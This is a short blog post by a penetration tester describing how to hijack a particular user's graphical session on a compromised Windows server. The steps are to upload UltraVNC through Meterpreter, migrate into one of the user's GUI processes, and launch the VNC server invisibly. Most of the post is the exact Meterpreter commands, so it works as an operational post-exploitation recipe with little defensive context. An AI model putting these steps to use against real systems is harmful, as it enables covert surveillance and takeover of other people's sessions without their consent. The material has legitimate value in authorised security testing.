Friday, February 21, 2014

Hijacking A Particular User's GUI Sessions With Meterpreter/VNC

Just a quick post to document a cool technique applied on a recent penetration test, nothing new or fancy, just something I hadn't done or thought to try before that came out of necessity.

The situation: You have SYSTEM access to a server that a number of users are remotely logged into. You want to see what a particular user is up to on that box, or you just want to get a GUI but for some reason don't have access to RDP. In our case, the Meterpreter VNC payloads were not working as desired.

The solution: Pretty simple:

Download UltraVNC Single Click server:

This VNC server can be launched invisibly from the command line. Launch it on a local test VM first and configure as necessary. After the first launch, an UltraVNC.ini file will be created with your settings. Test locally then upload the settings file and executable to the target:

meterpreter> cd C:\\Temp
meterpreter> upload winvnc.exe .
meterpreter> upload UltraVNC.ini .

List processes on the target:

meterpreter> ps

Pick a PID being run by the target user in a program with a GUI. Browser processes are a good choice:

meterpreter> migrate <PID>

Now just run the VNC server:
meterpreter> execute -f winvnc.exe

Should now be able to connect to the target machine on the VNC server port, you'll be hijacking the target users graphical session. If you just want to see what they're up to, run VNC in view only mode. In our particular situation, this was extremely useful.

No comments:

Post a Comment